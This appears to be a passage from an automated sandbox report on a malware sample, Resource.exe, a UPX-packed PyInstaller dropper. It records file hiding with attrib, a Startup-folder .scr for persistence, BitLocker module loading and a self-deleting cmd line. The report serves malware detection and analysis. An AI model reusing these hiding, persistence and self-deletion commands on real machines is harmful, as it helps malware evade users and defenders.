Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_00007FF84760862B push ebx; ret	14_2_00007FF8476086CA

Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1

Persistence and Installation Behavior

Found pyInstaller with non standard icon

Source: C:\Users\user\Desktop\Resource.exe

Process created: "C:\Users\user\Desktop\Resource.exe"

Uses attrib.exe to hide files

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\Desktop\Resource.exe"

Uses cmd line tools excessively to alter registry or file data

Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe
Source: C:\Users\user\Desktop\Resource.exe	Process created: attrib.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe

Source: C:\Users\user\Desktop\Resource.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI66322\_ssl.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Resource.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI66322\libffi-8.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Resource.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI66322\_socket.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Resource.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI66322\_queue.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Resource.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI66322\libssl-3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Resource.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI66322\_lzma.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Resource.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI66322\libcrypto-3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Resource.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Resource.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI66322\_ctypes.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Resource.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI66322\_sqlite3.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Resource.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI66322\python311.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Resource.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI66322\_decimal.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Resource.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI66322\_hashlib.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Resource.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI66322\_bz2.pyd	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\erdw4v5g\erdw4v5g.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Resource.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI66322\select.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Resource.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI66322\VCRUNTIME140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Resource.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI66322\unicodedata.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\Resource.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI66322\sqlite3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\Resource.exe

File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ? .scr

Jump to behavior

Source: C:\Users\user\Desktop\Resource.exe

File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ? .scr

Jump to behavior

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Self deletion via cmd or bat file

Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\user\Desktop\Resource.exe""
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\user\Desktop\Resource.exe""			Jump to behavior

Source: C:\Users\user\Desktop\Resource.exe

Code function: 0_2_00007FF6E60A6EF0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00007FF6E60A6EF0

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
